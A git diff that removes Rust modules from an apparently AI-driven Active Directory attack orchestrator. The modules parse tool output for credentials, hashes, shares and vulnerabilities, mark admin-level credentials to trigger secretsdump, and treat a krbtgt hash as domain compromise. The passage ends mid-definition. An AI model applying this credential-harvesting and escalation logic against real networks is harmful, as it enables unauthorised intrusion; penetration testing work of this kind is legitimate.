Err(e) => warn!(err = %e, "Failed to publish text-extracted share"), - } - } - - // Pwn3d! detection: scan raw text for admin indicators and upgrade credentials. - // netexec output like "[+] DOMAIN\user:password (Pwn3d!)" means the credential - // has local admin rights. Mark existing credentials as is_admin and trigger - // immediate high-priority secretsdump. - // Check each tool output independently (joining is safe here — Pwn3d! is a - // standalone marker with no stateful context to leak). - for part in &text_parts { - if part.contains("Pwn3d!") { - detect_and_upgrade_admin_credentials(part, dispatcher).await; - } - } - - if new_count > 0 { - info!( - count = new_count, - "Published new discoveries from raw text extraction" - ); - } -} - -/// Extract credentials, hashes, hosts, vulns, and shares from a result payload. -async fn extract_discoveries(payload: &Value, dispatcher: &Arc) -> Result<()> { - let mut parsed = parse_discoveries(payload); - - // Resolve credential lineage (parent_id / attack_step) before publishing. - // Read lock is released before any publish calls (which take write locks). - { - let state = dispatcher.state.read().await; - for cred in &mut parsed.credentials { - if cred.parent_id.is_none() { - let (pid, step) = resolve_parent_id( - &state.credentials, - &state.hashes, - &cred.source, - &cred.username, - &cred.domain, - None, - None, - ); - cred.parent_id = pid; - cred.attack_step = step; - } - } - for hash in &mut parsed.hashes { - if hash.parent_id.is_none() { - let (pid, step) = resolve_parent_id( - &state.credentials, - &state.hashes, - &hash.source, - &hash.username, - &hash.domain, - None, - None, - ); - hash.parent_id = pid; - hash.attack_step = step; - } - } - } - - for cred in parsed.credentials { - // Capture fields before move for timeline event - let source = cred.source.clone(); - let username = cred.username.clone(); - let domain = cred.domain.clone(); - let password = cred.password.clone(); - let is_admin = cred.is_admin; - let is_cracked = source.starts_with("cracked"); - match dispatcher - .state - .publish_credential(&dispatcher.queue, cred) - .await - { - Ok(true) => { - debug!("Published new credential from result"); - create_credential_timeline_event(dispatcher, &source, &username, &domain, is_admin) - .await; - // When a cracked credential is published, update the corresponding - // hash's cracked_password field in state and Redis. - if is_cracked { - let _ = dispatcher - .state - .update_hash_cracked_password( - &dispatcher.queue, - &username, - &domain, - &password, - ) - .await; - } - } - Ok(false) => {} // duplicate - Err(e) => warn!(err = %e, "Failed to publish credential"), - } - } - - for hash in parsed.hashes { - // Capture fields before move for timeline event - let username = hash.username.clone(); - let domain = hash.domain.clone(); - let hash_type = hash.hash_type.clone(); - let hash_value = hash.hash_value.clone(); - let source = hash.source.clone(); - match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { - Ok(true) => { - debug!("Published new hash from result"); - create_hash_timeline_event( - dispatcher, - &username, - &domain, - &hash_type, - &hash_value, - &source, - ) - .await; - } - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish hash"), - } - } - - for host in parsed.hosts { - let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; - } - - for user in parsed.users { - match dispatcher.state.publish_user(&dispatcher.queue, user).await { - Ok(true) => debug!("Published new user from result"), - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish user"), - } - } - - for vuln in parsed.vulnerabilities { - let _ = dispatcher - .state - .publish_vulnerability(&dispatcher.queue, vuln) - .await; - } - - for share in parsed.shares { - match dispatcher - .state - .publish_share(&dispatcher.queue, share) - .await - { - Ok(true) => debug!("Published new share from result"), - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish share"), - } - } - - // Extract trusted_domains from parser output - if let Some(trusts) = payload.get("trusted_domains").and_then(|v| v.as_array()) { - for trust_val in trusts { - if let Ok(trust) = - serde_json::from_value::(trust_val.clone()) - { - match dispatcher - .state - .publish_trust_info(&dispatcher.queue, trust) - .await - { - Ok(true) => info!("Published new trust relationship from result"), - Ok(false) => {} - Err(e) => warn!(err = %e, "Failed to publish trust info"), - } - } - } - } - - Ok(()) -} diff --git a/ares-orchestrator/src/result_processing/parsing.rs b/ares-orchestrator/src/result_processing/parsing.rs deleted file mode 100644 index dc850d64..00000000 --- a/ares-orchestrator/src/result_processing/parsing.rs +++ /dev/null @@ -1,159 +0,0 @@ -//! Pure parsing functions for result payloads -- no IO, no Redis. - -use serde_json::Value; - -use ares_core::models::{Credential, Hash, Host, Share, User, VulnerabilityInfo}; - -/// Parsed discoveries from a JSON result payload. -#[derive(Debug, Default)] -pub(crate) struct ParsedDiscoveries { - pub credentials: Vec, - pub hashes: Vec, - pub hosts: Vec, - pub users: Vec, - pub vulnerabilities: Vec, - pub shares: Vec, -} - -/// Resolve the parent credential or hash for a newly discovered item. -pub(crate) fn resolve_parent_id( - credentials: &[Credential], - hashes: &[Hash], - source: &str, - username: &str, - domain: &str, - input_username: Option<&str>, - input_domain: Option<&str>, -) -> (Option, i32) { - if source.starts_with("cracked") { - if let Some(h) = hashes.iter().rev().find(|h| { - h.username.eq_ignore_ascii_case(username) - && (domain.is_empty() || h.domain.eq_ignore_ascii_case(domain)) - }) { - return (Some(h.id.clone()), h.attack_step + 1); - } - } - if let Some(in_user) = input_username.filter(|u| !u.is_empty()) { - let in_domain = input_domain.unwrap_or(""); - let is_same = in_user.eq_ignore_ascii_case(username) - && (in_domain.eq_ignore_ascii_case(domain) - || in_domain.is_empty() - || domain.is_empty()); - if !is_same { - if let Some(c) = credentials.iter().rev().find(|c| { - c.username.eq_ignore_ascii_case(in_user) - && (in_domain.is_empty() - || c.domain.is_empty() - || c.domain.eq_ignore_ascii_case(in_domain)) - }) { - return (Some(c.id.clone()), c.attack_step + 1); - } - if let Some(h) = hashes.iter().rev().find(|h| { - h.username.eq_ignore_ascii_case(in_user) - && (in_domain.is_empty() - || h.domain.is_empty() - || h.domain.eq_ignore_ascii_case(in_domain)) - }) { - return (Some(h.id.clone()), h.attack_step + 1); - } - } - } - (None, 0) -} - -pub(crate) fn parse_discoveries(payload: &Value) -> ParsedDiscoveries { - let mut result = ParsedDiscoveries::default(); - - if let Some(creds) = payload.get("credentials").and_then(|v| v.as_array()) { - for cred_val in creds { - if let Ok(cred) = serde_json::from_value::(cred_val.clone()) { - result.credentials.push(cred); - } - } - } - if let Some(cred_val) = payload.get("credential") { - if let Ok(cred) = serde_json::from_value::(cred_val.clone()) { - result.credentials.push(cred); - } - } - if let Some(cracked) = payload.get("cracked_password").and_then(|v| v.as_str()) { - if let Some(username) = payload.get("username").and_then(|v| v.as_str()) { - let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); - result.credentials.push(Credential { - id: uuid::Uuid::new_v4().to_string(), - username: username.to_string(), - password: cracked.to_string(), - domain: domain.to_string(), - source: "cracked".to_string(), - discovered_at: Some(chrono::Utc::now()), - is_admin: false, - parent_id: None, - attack_step: 0, - }); - } - } - if let Some(hashes) = payload.get("hashes").and_then(|v| v.as_array()) { - for hash_val in hashes { - if let Ok(hash) = serde_json::from_value::(hash_val.clone()) { - result.hashes.push(hash); - } - } - } - if let Some(hosts) = payload.get("hosts").and_then(|v| v.as_array()) { - for host_val in hosts { - if let Ok(host) = serde_json::from_value::(host_val.clone()) { - result.hosts.push(host); - } - } - } - // Users -- defense-in-depth: only accept entries with a parser-verified source. - const TRUSTED_USER_SOURCES: &[&str] = &["kerberos_enum", "netexec_user_enum"]; - if let Some(users) = payload.get("discovered_users").and_then(|v| v.as_array()) { - for user_val in users { - if let Ok(user) = serde_json::from_value::(user_val.clone()) { - if TRUSTED_USER_SOURCES.contains(&user.source.as_str()) { - result.users.push(user); - } - } - } - } - if let Some(vulns) = payload.get("vulnerabilities").and_then(|v| v.as_array()) { - for vuln_val in vulns { - if let Ok(vuln) = serde_json::from_value::(vuln_val.clone()) { - result.vulnerabilities.push(vuln); - } - } - } - if result.vulnerabilities.is_empty() { - if let Some(vuln_val) = payload.get("vulnerability") { - if let Ok(vuln) = serde_json::from_value::(vuln_val.clone()) { - result.vulnerabilities.push(vuln); - } - } - } - if let Some(shares) = payload.get("shares").and_then(|v| v.as_array()) { - for share_val in shares { - if let Ok(share) = serde_json::from_value::(share_val.clone()) { - result.shares.push(share); - } - } - } - result -} - -/// Check if a payload contains domain admin indicators. Pure function. -pub(crate) fn has_domain_admin_indicator(payload: &Value) -> bool { - if payload.get("has_domain_admin").and_then(|v| v.as_bool()) == Some(true) { - return true; - } - if let Some(hashes) = payload.get("hashes").and_then(|v| v.as_array()) { - for hash_val in hashes { - if let Some(username) = hash_val.get("username").and_then(|v| v.as_str()) { - if username.to_lowercase() == "krbtgt" { - return true; - } - } - } - } - false -} diff --git a/ares-orchestrator/src/result_processing/tests.rs b/ares-orchestrator/src/result_processing/tests.rs deleted file mode 100644 index 69658a47..00000000 --- a/ares-orchestrator/src/result_processing/tests.rs +++ /dev/null @@ -1,211 +0,0 @@ -use super::parsing::{has_domain_admin_indicator, parse_discoveries}; -use serde_json::json; - -#[test] -fn test_parse_credentials_array() { - let payload = json!({ - "credentials": [ - {"id": "c1", "username": "admin", "password": "P@ss1", - "domain": "contoso.local", "source": "kerberoast", "is_admin": false, "attack_step": 0}, - {"id": "c2", "username": "svc_sql", "password": "SqlPass1", - "domain": "contoso.local", "source": "secretsdump", "is_admin": false, "attack_step": 0} - ] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 2); - assert_eq!(parsed.credentials[0].username, "admin"); - assert_eq!(parsed.credentials[1].username, "svc_sql"); -} - -#[test] -fn test_parse_single_credential() { - let payload = json!({ - "credential": { - "id": "c1", "username": "admin", "password": "P@ss1", - "domain": "contoso.local", "source": "ntlm_relay", "is_admin": false, "attack_step": 0 - } - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 1); - assert_eq!(parsed.credentials[0].source, "ntlm_relay"); -} - -#[test] -fn test_parse_cracked_password() { - let payload = - json!({"cracked_password": "Summer2024!", "username": "jdoe", "domain": "contoso.local"}); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 1); - assert_eq!(parsed.credentials[0].username, "jdoe"); - assert_eq!(parsed.credentials[0].password, "Summer2024!"); - assert_eq!(parsed.credentials[0].source, "cracked"); -} - -#[test] -fn test_parse_cracked_password_without_username_ignored() { - let payload = json!({"cracked_password": "Summer2024!"}); - let parsed = parse_discoveries(&payload); - assert!(parsed.credentials.is_empty()); -} - -#[test] -fn test_parse_hashes() { - let payload = json!({ - "hashes": [{"id": "h1", "username": "Administrator", "hash_value": "aad3b435:abcdef123456", - "hash_type": "NTLM", "domain": "contoso.local", "source": "secretsdump", - "is_cracked": false, "attack_step": 0}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.hashes.len(), 1); - assert_eq!(parsed.hashes[0].username, "Administrator"); - assert_eq!(parsed.hashes[0].hash_type, "NTLM"); -} - -#[test] -fn test_parse_hosts() { - let payload = json!({ - "hosts": [{"ip": "192.168.58.10", "hostname": "dc01.contoso.local", - "os": "Windows Server 2019", "is_dc": true, "open_ports": [88, 389, 445]}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.hosts.len(), 1); - assert_eq!(parsed.hosts[0].ip, "192.168.58.10"); - assert!(parsed.hosts[0].is_dc); -} - -#[test] -fn test_parse_users_with_trusted_source() { - let payload = json!({ - "discovered_users": [{"username": "jdoe", "domain": "contoso.local", - "source": "kerberos_enum", "is_admin": false}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.users.len(), 1); - assert_eq!(parsed.users[0].username, "jdoe"); -} - -#[test] -fn test_parse_users_rejects_untrusted_source() { - let payload = json!({ - "discovered_users": [ - {"username": "fake_admin", "domain": "contoso.local", "is_admin": false}, - {"username": "also_fake", "domain": "contoso.local", - "source": "llm_hallucination", "is_admin": false} - ] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.users.len(), 0); -} - -#[test] -fn test_parse_vulnerabilities() { - let payload = json!({ - "vulnerabilities": [{"vuln_id": "vuln-001", "vuln_type": "constrained_delegation", - "target": "192.168.58.20", "discovered_by": "recon", - "details": {"account": "svc_sql"}, "recommended_agent": "privesc", - "priority": 3}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.vulnerabilities.len(), 1); - assert_eq!( - parsed.vulnerabilities[0].vuln_type, - "constrained_delegation" - ); -} - -#[test] -fn test_parse_shares() { - let payload = json!({ - "shares": [ - {"host": "192.168.58.10", "name": "SYSVOL", "permissions": "READ", "comment": "Logon server share"}, - {"host": "192.168.58.10", "name": "ADMIN$", "permissions": "READ,WRITE"} - ] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.shares.len(), 2); - assert_eq!(parsed.shares[0].name, "SYSVOL"); - assert_eq!(parsed.shares[1].name, "ADMIN$"); -} - -#[test] -fn test_parse_empty_payload() { - let payload = json!({}); - let parsed = parse_discoveries(&payload); - assert!(parsed.credentials.is_empty()); - assert!(parsed.hashes.is_empty()); - assert!(parsed.hosts.is_empty()); - assert!(parsed.users.is_empty()); - assert!(parsed.vulnerabilities.is_empty()); - assert!(parsed.shares.is_empty()); -} - -#[test] -fn test_parse_malformed_entries_skipped() { - let payload = json!({ - "credentials": [ - {"username": "valid", "id": "c1", "password": "x", "domain": "d", - "source": "s", "is_admin": false, "attack_step": 0}, - {"bad_field": "not a credential"} - ], - "hashes": [{"not_a_hash": true}] - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 1); - assert!(parsed.hashes.is_empty()); -} - -#[test] -fn test_parse_mixed_payload() { - let payload = json!({ - "credentials": [{"id": "c1", "username": "admin", "password": "P@ss", - "domain": "contoso.local", "source": "test", "is_admin": true, "attack_step": 0}], - "hashes": [{"id": "h1", "username": "krbtgt", "hash_value": "abc123", "hash_type": "NTLM", - "domain": "contoso.local", "source": "secretsdump", "is_cracked": false, "attack_step": 0}], - "hosts": [{"ip": "192.168.58.10", "hostname": "dc01.contoso.local", "is_dc": true}], - "has_domain_admin": true, "domain_admin_path": "secretsdump -> Administrator" - }); - let parsed = parse_discoveries(&payload); - assert_eq!(parsed.credentials.len(), 1); - assert_eq!(parsed.hashes.len(), 1); - assert_eq!(parsed.hosts.len(), 1); -} - -#[test] -fn test_da_indicator_explicit_flag() { - assert!(has_domain_admin_indicator( - &json!({"has_domain_admin": true}) - )); -} - -#[test] -fn test_da_indicator_false_flag() { - assert!(!has_domain_admin_indicator( - &json!({"has_domain_admin": false}) - )); -} - -#[test] -fn test_da_indicator_krbtgt_hash() { - assert!(has_domain_admin_indicator( - &json!({"hashes": [{"username": "krbtgt", "hash_value": "abc"}]}) - )); -} - -#[test] -fn test_da_indicator_krbtgt_case_insensitive() { - assert!(has_domain_admin_indicator( - &json!({"hashes": [{"username": "KRBTGT", "hash_value": "abc"}]}) - )); -} - -#[test] -fn test_da_indicator_non_krbtgt_hash() { - assert!(!has_domain_admin_indicator( - &json!({"hashes": [{"username": "Administrator", "hash_value": "abc"}]}) - )); -} - -#[test] -fn test_da_indicator_empty_payload() { - assert!(!has_domain_admin_indicator(&json!({}))); -} diff --git a/ares-orchestrator/src/result_processing/timeline.rs b/ares-orchestrator/src/result_processing/timeline.rs deleted file mode 100644 index d1cb5a30..00000000 --- a/ares-orchestrator/src/result_processing/timeline.rs +++ /dev/null @@ -1,100 +0,0 @@ -//! Timeline event helpers. - -use std::sync::Arc; - -use crate::dispatcher::Dispatcher; - -pub(crate) async fn create_credential_timeline_event( - dispatcher: &Arc, - source: &str, - username: &str, - domain: &str, - is_admin: bool, -) { - let mut techniques: Vec = vec![if is_admin { - "T1078".to_string() - } else { - "T1552".to_string() - }]; - let source_lower = source.to_lowercase(); - if source_lower.contains("kerberoast") { - techniques.push("T1558.003".to_string()); - } - if source_lower.contains("asrep") || source_lower.contains("as-rep") { - techniques.push("T1558.004".to_string()); - } - if source_lower.contains("cracked") { - techniques.push("T1110".to_string()); - } - let event_id = format!( - "evt-cred-{}", - &uuid::Uuid::new_v4().simple().to_string()[..8] - ); - let event = serde_json::json!({ - "id": event_id, - "timestamp": chrono::Utc::now().to_rfc3339(), - "source": source, - "description": format!("Credential discovered: {domain}\\{username} via {source}"), - "mitre_techniques": techniques, - }); - let _ = dispatcher - .state - .persist_timeline_event(&dispatcher.queue, &event, &techniques) - .await; -} - -pub(crate) async fn create_hash_timeline_event( - dispatcher: &Arc, - username: &str, - domain: &str, - hash_type: &str, - hash_value: &str, - source: &str, -) { - let mut techniques: Vec = vec!["T1003".to_string()]; - let hash_value_lower = hash_value.to_lowercase(); - let hash_type_lower = hash_type.to_lowercase(); - let source_lower = source.to_lowercase(); - if hash_value_lower.contains("$krb5tgs$") - || matches!( - hash_type_lower.as_str(), - "kerberoast" | "krb5tgs" | "tgs-rep" | "tgs" - ) - || source_lower.contains("kerberoast") - { - techniques.push("T1558.003".to_string()); - } - if hash_value_lower.contains("$krb5asrep$") - || matches!(hash_type_lower.as_str(), "asrep" | "as-rep" | "krb5asrep") - || source_lower.contains("asrep") - || source_lower.contains("as-rep") - { - techniques.push("T1558.004".to_string()); - } - if hash_type_lower == "ntlm" - && (source_lower.contains("secretsdump") || source_lower.contains("dcsync")) - { - techniques.push("T1003.006".to_string()); - } - let is_critical = matches!(username.to_lowercase().as_str(), "krbtgt" | "administrator"); - let description = if is_critical { - format!("CRITICAL: Hash discovered: {domain}\\{username} ({hash_type})") - } else { - format!("Hash discovered: {domain}\\{username} ({hash_type})") - }; - let event_id = format!( - "evt-hash-{}", - &uuid::Uuid::new_v4().simple().to_string()[..8] - ); - let event = serde_json::json!({ - "id": event_id, - "timestamp": chrono::Utc::now().to_rfc3339(), - "source": source, - "description": description, - "mitre_techniques": techniques, - }); - let _ = dispatcher - .state - .persist_timeline_event(&dispatcher.queue, &event, &techniques) - .await; -} diff --git a/ares-orchestrator/src/results.rs b/ares-orchestrator/src/results.rs deleted file mode 100644 index d4829b09..00000000 --- a/ares-orchestrator/src/results.rs +++ /dev/null @@ -1,185 +0,0 @@ -//! Result consumption loop. -//! -//! A dedicated tokio task that polls Redis for completed task results and -//! feeds them back to the main orchestration loop via an mpsc channel. -//! Mirrors the Python `MonitoringMixin._result_consumer` but uses async -//! Rust instead of a dedicated thread. - -use std::sync::Arc; -use std::time::Duration; - -use anyhow::Result; -use tokio::sync::{mpsc, watch}; -use tracing::{debug, error, info, warn}; - -use crate::config::OrchestratorConfig; -use crate::routing::ActiveTaskTracker; -use crate::task_queue::{TaskQueue, TaskResult}; - -// --------------------------------------------------------------------------- -// CompletedTask — sent over the channel to the main loop -// --------------------------------------------------------------------------- - -/// A completed task result, ready for the orchestrator to process. -#[derive(Debug)] -pub struct CompletedTask { - pub task_id: String, - pub result: TaskResult, -} - -// --------------------------------------------------------------------------- -// Result consumer -// --------------------------------------------------------------------------- - -/// Spawn the result-consumer background task. -/// -/// Returns an mpsc receiver that the main loop reads from. -pub fn spawn_result_consumer( - queue: TaskQueue, - tracker: ActiveTaskTracker, - config: Arc, - mut shutdown: watch::Receiver, -) -> (tokio::task::JoinHandle<()>, mpsc::Receiver) { - // Bounded channel — back-pressure if the main loop can't keep up. - let (tx, rx) = mpsc::channel::(256); - - let handle = tokio::spawn(async move { - let mut consecutive_failures: u32 = 0; - let poll_interval = config.result_poll_interval; - - info!("Result consumer started"); - - loop { - // Check shutdown before each poll cycle - if *shutdown.borrow() { - info!("Result consumer shutting down"); - break; - } - - match consume_cycle(&queue, &tracker, &tx).await { - Ok(found) => { - if consecutive_failures > 0 { - info!( - prev_failures = consecutive_failures, - "Result consumer recovered" - ); - } - consecutive_failures = 0; - - if found > 0 { - debug!(results = found, "Consumed results"); - // When results arrive, poll again immediately instead - // of sleeping — results often come in bursts. - continue; - } - } - Err(e) => { - consecutive_failures += 1; - let is_conn = is_connection_error(&e); - - if is_conn { - let delay = Duration::from_secs(std::cmp::min( - 60, - 2_u64.pow(consecutive_failures.min(5)), - )); - - if consecutive_failures >= 10 { - error!( - attempt = consecutive_failures, - err = %e, - "Result consumer: Redis unavailable for extended period, still retrying" - ); - } else { - warn!( - attempt = consecutive_failures, - err = %e, - delay_secs = delay.as_secs(), - "Result consumer: connection error, retrying" - ); - } - - tokio::select! { - _ = tokio::time::sleep(delay) => {}, - _ = shutdown.changed() => { - info!("Result consumer shutting down (signalled during backoff)"); - break; - } - } - continue; - } else { - warn!(err = %e, "Result consumer non-connection error"); - } - } - } - - // Normal pace — sleep between polls - tokio::select! { - _ = tokio::time::sleep(poll_interval) => {}, - _ = shutdown.changed() => { - info!("Result consumer shutting down (signalled during sleep)"); - break; - } - } - } - - info!("Result consumer stopped"); - }); - - (handle, rx) -} - -/// One polling cycle: check all tracked tasks for results. -async fn consume_cycle( - queue: &TaskQueue, - tracker: &ActiveTaskTracker, - tx: &mpsc::Sender, -) -> Result { - let task_ids = tracker.task_ids().await; - if task_ids.is_empty() { - return Ok(0); - } - - let results = queue - .check_results_batch(&task_ids) - .await - .inspect_err(|e| warn!(tracked = task_ids.len(), err = %e, "check_results_batch failed"))?; - - let mut found = 0_usize; - for (task_id, maybe_result) in results { - if let Some(result) = maybe_result { - // Remove from tracker - tracker.remove(&task_id).await; - - // Send to main loop - let completed = CompletedTask { - task_id: task_id.clone(), - result, - }; - if tx.send(completed).await.is_err() { - // Main loop dropped the receiver — shutting down - info!("Result channel closed, stopping consumer"); - break; - } - found += 1; - } - } - - Ok(found) -} - -/// Heuristic to identify Redis connection errors. -fn is_connection_error(e: &anyhow::Error) -> bool { - let msg = e.to_string().to_lowercase(); - [ - "connection", - "connect", - "closed", - "timeout", - "broken pipe", - "reset", - "refused", - "sentinel", - ] - .iter() - .any(|kw| msg.contains(kw)) -} diff --git a/ares-orchestrator/src/routing.rs b/ares-orchestrator/src/routing.rs deleted file mode 100644 index 5291fa62..00000000 --- a/ares-orchestrator/src/routing.rs +++ /dev/null @@ -1,258 +0,0 @@ -//! Task routing — decides which agent queue receives a task. -//! -//! Mirrors the Python `ares.core.dispatcher.routing.RoutingMixin` logic: -//! route by role, respect per-role concurrency limits, track active tasks. - -use std::collections::HashMap; -use std::sync::Arc; - -use tokio::sync::Mutex; - -// --------------------------------------------------------------------------- -// Active-task tracker (shared across routing + monitoring + throttling) -// --------------------------------------------------------------------------- - -/// Per-role tracking of in-flight tasks. -#[derive(Debug, Clone)] -pub struct ActiveTask { - pub task_id: String, - pub task_type: String, - pub role: String, - pub submitted_at: std::time::Instant, -} - -/// Thread-safe tracker for all in-flight tasks. -#[derive(Debug, Clone)] -pub struct ActiveTaskTracker { - inner: Arc>, -} - -#[derive(Debug, Default)] -struct TrackerInner { - /// task_id -> ActiveTask - tasks: HashMap, - /// role -> count of active tasks - role_counts: HashMap, -} - -impl Default for ActiveTaskTracker { - fn default() -> Self { - Self::new() - } -} - -impl ActiveTaskTracker { - pub fn new() -> Self { - Self { - inner: Arc::new(Mutex::new(TrackerInner::default())), - } - } - - /// Register a newly submitted task. - pub async fn add(&self, task: ActiveTask) { - let mut inner = self.inner.lock().await; - *inner.role_counts.entry(task.role.clone()).or_insert(0) += 1; - inner.tasks.insert(task.task_id.clone(), task); - } - - /// Remove a completed/failed task. Returns the task if it was tracked. - pub async fn remove(&self, task_id: &str) -> Option { - let mut inner = self.inner.lock().await; - if let Some(task) = inner.tasks.remove(task_id) { - if let Some(count) = inner.role_counts.get_mut(&task.role) { - *count = count.saturating_sub(1); - } - Some(task) - } else { - None - } - } - - /// Number of active tasks for a role. - pub async fn count_for_role(&self, role: &str) -> usize { - let inner = self.inner.lock().await; - inner.role_counts.get(role).copied().unwrap_or(0) - } - - /// Total number of active LLM-consuming tasks (excludes `crack`, `command`). - pub async fn llm_task_count(&self) -> usize { - let inner = self.inner.lock().await; - inner - .tasks - .values() - .filter(|t| !is_non_llm_task(&t.task_type)) - .count() - } - - /// Total active tasks across all roles. - #[allow(dead_code)] - pub async fn total(&self) -> usize { - let inner = self.inner.lock().await; - inner.tasks.len() - } - - /// Get all tracked task IDs (for result polling). - pub async fn task_ids(&self) -> Vec { - let inner = self.inner.lock().await; - inner.tasks.keys().cloned().collect() - } - - /// Get tasks older than `age` that have not received a result. - pub async fn stale_tasks(&self, max_age: std::time::Duration) -> Vec { - let inner = self.inner.lock().await; - let cutoff = std::time::Instant::now() - max_age; - inner - .tasks - .values() - .filter(|t| t.submitted_at < cutoff) - .cloned() - .collect() - } -} - -/// Task types that do not consume LLM tokens. -const NON_LLM_TYPES: &[&str] = &["crack", "command"]; - -pub fn is_non_llm_task(task_type: &str) -> bool { - NON_LLM_TYPES.contains(&task_type) -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn non_llm_task_classification() { - assert!(is_non_llm_task("crack")); - assert!(is_non_llm_task("command")); - assert!(!is_non_llm_task("recon")); - assert!(!is_non_llm_task("exploit")); - assert!(!is_non_llm_task("privesc_enumeration")); - assert!(!is_non_llm_task("")); - } - - #[tokio::test] - async fn tracker_add_remove() { - let tracker = ActiveTaskTracker::new(); - assert_eq!(tracker.total().await, 0); - - tracker - .add(ActiveTask { - task_id: "t1".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - - assert_eq!(tracker.total().await, 1); - assert_eq!(tracker.count_for_role("recon").await, 1); - assert_eq!(tracker.count_for_role("lateral").await, 0); - - let removed = tracker.remove("t1").await; - assert!(removed.is_some()); - assert_eq!(tracker.total().await, 0); - assert_eq!(tracker.count_for_role("recon").await, 0); - } - - #[tokio::test] - async fn tracker_remove_nonexistent() { - let tracker = ActiveTaskTracker::new(); - assert!(tracker.remove("nonexistent").await.is_none()); - } - - #[tokio::test] - async fn llm_count_excludes_non_llm() { - let tracker = ActiveTaskTracker::new(); - - for (id, task_type, role) in [ - ("t1", "recon", "recon"), - ("t2", "crack", "cracker"), - ("t3", "command", "lateral"), - ("t4", "exploit", "privesc"), - ] { - tracker - .add(ActiveTask { - task_id: id.into(), - task_type: task_type.into(), - role: role.into(), - submitted_at: std::time::Instant::now(), - }) - .await; - } - - assert_eq!(tracker.total().await, 4); - assert_eq!(tracker.llm_task_count().await, 2); // recon + exploit - } - - #[tokio::test] - async fn stale_tasks_detection() { - let tracker = ActiveTaskTracker::new(); - - tracker - .add(ActiveTask { - task_id: "old".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now() - std::time::Duration::from_secs(120), - }) - .await; - - tracker - .add(ActiveTask { - task_id: "new".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - - let stale = tracker - .stale_tasks(std::time::Duration::from_secs(60)) - .await; - assert_eq!(stale.len(), 1); - assert_eq!(stale[0].task_id, "old"); - } - - #[tokio::test] - async fn task_ids_collected() { - let tracker = ActiveTaskTracker::new(); - tracker - .add(ActiveTask { - task_id: "a".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - tracker - .add(ActiveTask { - task_id: "b".into(), - task_type: "exploit".into(), - role: "privesc".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - - let mut ids = tracker.task_ids().await; - ids.sort(); - assert_eq!(ids, vec!["a", "b"]); - } - - #[tokio::test] - async fn role_count_saturating_sub() { - let tracker = ActiveTaskTracker::new(); - // Double-remove shouldn't panic or underflow - tracker - .add(ActiveTask { - task_id: "t1".into(), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: std::time::Instant::now(), - }) - .await; - tracker.remove("t1").await; - tracker.remove("t1").await; // second remove returns None - assert_eq!(tracker.count_for_role("recon").await, 0); - } -} diff --git a/ares-orchestrator/src/state/dedup.rs b/ares-orchestrator/src/state/dedup.rs deleted file mode 100644 index 7e8112fe..00000000 --- a/ares-orchestrator/src/state/dedup.rs +++ /dev/null @@ -1,69 +0,0 @@ -//! Dedup persistence — mark_exploited, persist_dedup, persist_mssql. - -use anyhow::Result; -use redis::AsyncCommands; - -use ares_core::state; - -use super::SharedState; -use crate::task_queue::TaskQueue; - -impl SharedState { - /// Mark a vulnerability as exploited. - pub async fn mark_exploited(&self, queue: &TaskQueue, vuln_id: &str) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_EXPLOITED - ); - let mut conn = queue.connection(); - let _: () = conn.sadd(&key, vuln_id).await?; - let _: () = conn.expire(&key, 86400).await?; - - let mut state = self.inner.write().await; - state.exploited_vulnerabilities.insert(vuln_id.to_string()); - Ok(()) - } - - /// Persist a dedup set entry to Redis. - pub async fn persist_dedup(&self, queue: &TaskQueue, set_name: &str, key: &str) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let redis_key = format!( - "{}:{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_DEDUP_PREFIX, - set_name - ); - let mut conn = queue.connection(); - let _: () = conn.sadd(&redis_key, key).await?; - let _: () = conn.expire(&redis_key, 86400).await?; - Ok(()) - } - - /// Persist MSSQL enum dispatched entry to Redis. - pub async fn persist_mssql_dispatched(&self, queue: &TaskQueue, ip: &str) -> Result<()> { - let operation_id = { - let state = self.inner.read().await; - state.operation_id.clone() - }; - let redis_key = format!( - "{}:{}:{}", - state::KEY_PREFIX, - operation_id, - state::KEY_MSSQL_ENUM_DISPATCHED - ); - let mut conn = queue.connection(); - let _: () = conn.sadd(&redis_key, ip).await?; - let _: () = conn.expire(&redis_key, 86400).await?; - Ok(()) - } -} diff --git a/ares-orchestrator/src/state/inner.rs b/ares-orchestrator/src/state/inner.rs deleted file mode 100644 index 9247675f..00000000 --- a/ares-orchestrator/src/state/inner.rs +++ /dev/null @@ -1,377 +0,0 @@ -//! StateInner — the actual mutable state backing SharedState. - -use std::collections::{HashMap, HashSet}; - -use chrono::{DateTime, Utc}; - -use ares_core::models::*; - -use super::ALL_DEDUP_SETS; - -/// Lockout quarantine duration: 5 minutes matches S4U cooldown and typical -/// AD lockout observation windows. Longer values block the critical path. -const QUARANTINE_DURATION_SECS: i64 = 300; - -#[derive(Debug)] -pub struct 